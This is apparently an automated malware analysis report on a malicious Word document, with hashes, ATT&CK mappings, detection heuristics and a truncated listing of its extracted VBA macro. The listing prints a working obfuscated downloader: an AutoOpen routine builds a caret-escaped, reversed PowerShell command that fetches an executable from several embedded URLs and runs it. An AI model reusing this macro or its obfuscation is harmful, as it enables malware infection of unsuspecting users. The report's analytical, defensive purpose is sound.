Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2a8c2ebeed73c172…

MALICIOUS

Office (OLE)

70.4 KB · Created: 2018-09-12 21:06:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-16
MD5: 9bd2127f928580aa27983ade5ae9e329 SHA-1: e5cd9e9fa6bae428f18de4f1ba5ece2ce1d6751b SHA-256: 2a8c2ebeed73c172d347af258a0ade7ebc73d29897797d25f9c6259cdfeff059
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 — Command and Scripting Interpreter: Visual Basic; T1204.002 — User Execution: Malicious File

The sample contains a VBA macro with an AutoOpen subroutine, which Word runs automatically when the document is opened — a common technique for executing malicious code without further user interaction once macros are enabled. The macro calls Shell(), indicating an attempt to execute an external command or payload; the argument is not a literal but is concatenated at runtime from the return values of several helper functions (OWKbk, FYHiBaulkUj, EmJtuMBUKaiYI, XbjjnRM), each of which assembles its string from short fragments, caret characters (which cmd.exe strips as escape characters at execution time) and Chr() calls on arithmetic expressions, so the command cannot be recovered by a simple string search over the source. The many `Set` statements referencing undeclared names, executed under `On Error Resume Next`, appear to be inert filler whose only purpose is to add noise for analysts and signatures. The ClamAV signature (Doc.Downloader.Generic-6682690-0) also classifies this as a downloader, further supporting the malicious intent.

Heuristics 6

  • ClamAV: Doc.Downloader.Generic-6682690-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6682690-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The macro passes a string to Shell(), which hands it to the operating system for execution; in this sample the string is assembled at runtime from several helper functions rather than appearing as a literal (see the extracted macro).
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The macro defines an AutoOpen subroutine, which Word executes automatically when the document is opened and macros are enabled.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see OLE_VBA_MACROS and the extracted macros.bas), so this finding should be read as corroborating evidence of the auto-execution surface rather than as a standalone indicator.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). This is the standard DrawingML XML namespace identifier that Office writes into document structures; it is an expected artifact of the file format rather than a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5008 bytes
SHA-256: 42aa7de7ce529ec881126a3c822485572cd81732793f756ffc04ee6d56770551
Preview script
First 1,000 lines of the extracted script (the listing below is truncated)
Attribute VB_Name = "QlpHHZRDSaSz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Set LwOYZJ = SfXUC
   Set ozwzX = jvHKm
   Set GiCKb = djjwc
   Set CIpwiR = nnRwDZ
Shell OWKbk + FYHiBaulkUj + EmJtuMBUKaiYI + XbjjnRM, Format(0)
   Set ZfSNGH = GNrcK
   Set nqHUn = iSiXQ
   Set pdcXsf = TPtnO
End Sub



Attribute VB_Name = "cKQnqEZvqf"
Function OWKbk()

On _
Error _
Resume _
Next
Set TTipvb = vqABR
   Set cBVwL = MbMATS
   Set hWcHi = UJFjT
   Set iVrwlY = mwbjUZ
   Set CSzcW = BPjJmS
VJFmbSNZ = Format(Chr(10 + 5 + 15 + 16 + 53)) + "md" + " /V^" + ":/" + Format(Chr(7 + 4 + 10 + 11 + 35)) + Format(Chr(3 + 1 + 4 + 5 + 21)) + "^s" + "^e^t U" + "^" + "Q^K=^ " + " ^ ^   " + "  ^  "
Set uRrBi = KhTqw
   Set GLmwGw = RFENqV
   Set dKIMR = Bhtfi
   Set NSJDEz = OSkni
   Set CmKwfO = ThMVKk
aAwwVX = "   ^  " + " ^" + " ^}}^{" + "h" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^" + "ta" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^" + "}" + "^;^" + "ka" + "^e" + "r" + "b^;"
Set OSQiR = SCsqi
   Set kwhtOf = oZfWf
   Set FQSzd = wTuFc
iWfkRLiLbdp = "O^" + "J" + "^i$^ m^" + "e" + "tI-ek"
Set bSRdVa = kLmTF
   Set omtCmC = lZtFu
   Set BcQvt = NGOsK
OLKEKUsM = "^ov" + "nI^;)O^" + "J^i^$" + "^" + " ^,^U^a" + "z^$(^"
Set FjdXF = fHLaj
   Set ptXYbf = jiVYM
   Set hYBsi = sjsQi
   Set ltRqPJ = YNqUi
fNaNGMq = "eli^" + "Fdaol" + "n^wo" + "^D^.l" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "T^$^{" + "y" + "r"
Set WKFLOB = jJhwSp
   Set HqlDO = RiJDTu
   Set hJIiHK = KWaanK
ziVUQoBwFU = "t^" + "{)^ah" + "^o^" + "$ ni ^" + "U^a^z^" + "$(^" + "h" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "a" + "^e" + "rof;'e" + "^" + "x^e." + "'+wM^"
Set qhPMi = wVUvEj
   Set vGdAc = pjiwT
   Set LcbiJ = rMlfH
   Set MnNLF = OPiTJ
ikKTuJGS = "d$^+^" + "'\^'" + "+" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "i^lbu" + "^p:v" + "ne^"
Set cHzQtl = lttRv
   Set vKbWA = LBVWt
   Set EjISUi = PEmONO
   Set tUuKrK = UsmJF
mzEzUR = "$^" + "=^O^" + "Ji^$" + ";^'^" + "0^9" + "^"
Set dWcDGE = azQXoq
   Set ImhkH = cjZYk
fPhpjtfqOIE = "5" + "' ^=^ ^" + "wMd$^;" + ")" + "^'^@'(" + "t" + "^ilpS." + "^'9d^M" + "^j" + "^1" + "^H" + "D" + "t7x"
Set KZNpTI = lKkXJt
   Set UVdwfd = XnSkA
   Set fWrUv = qJwXPV
rdvswkBZq = "/" + "mo" + Format(Chr(10 + 5 + 15 + 16 + 53)) + ".n^" + "u^gv" + "od//^" + ":^p^" + "tth^@" + "S^5u^O"
Set NwHfpF = HQlBo
TkEdnVoVw = "^u" + "^AS" + "O^" + "1f" + "/^t^" + "e" + "n." + "ets^" + "k^e"
Set jIEjf = fpwKD
   Set ZtSzr = KSBMCz
   Set GjJGu = aTcVzz
   Set GmGlC = EGEMQa
   Set bitwn = bnHQoz
   Set JJUluf = jbvtc
kAiPDAA = "tn^o" + "kv//" + "^:p^tt" + "h@b^I" + "q^" + "zH" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "^zI^" + "3Y/^or^" + ".^t"
Set wELkX = VJCukd
MUZZCi = "^fo^s" + "^" + "tn^irps" + ".^1" + "^3" + "^pw" + "s^l" + "^g//" + ":p^t^" + "th^@" + "^D" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "^s^A" + "^S^J^E" + "/"
OWKbk = VJFmbSNZ + aAwwVX + iWfkRLiLbdp + OLKEKUsM + fNaNGMq + ziVUQoBwFU + ikKTuJGS + mzEzUR + fPhpjtfqOIE + rdvswkBZq + TkEdnVoVw + kAiPDAA + MUZZCi
   Set UTjiK = dwkFto
   Set iEjNwG = FqYlE
   Set CHQHN = rjNfjZ
End Function
Function FYHiBaulkUj()

On _
Error _
Resume _
Next
Set iisjPU = APDwAP
   Set zFzNt = plasCz
   Set jZlzi = usUUv
aaIwGlVq = "mo" + Format(Chr(10 + 5 + 15 + 16 + 53)) + ".^e" + "^" + "dnar^g" + "as" + "a" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "a^tni" + "uq//^" + ":p^t" + "th^@936" + "^L" + "^" + "4^PE" + "/^"
Set DOscG = ibbHO
   Set sRrNUw = jiNBkR
   Set ldShV = iMAatp
FYkDO = "ku^.^o" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^.sut" + "la^t//" + ":^" + "p^t^t^" + "h^'=a^" + "ho$^" + ";tn^" + "e^"
Set ilhXBb = HaOLQY
suvliajd = "i" + "^l" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "be^W." + "teN^" + " ^t" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "ej^" + "bo-wen^" + "=^l" + Format(Chr(10 + 5 + 15
... (truncated)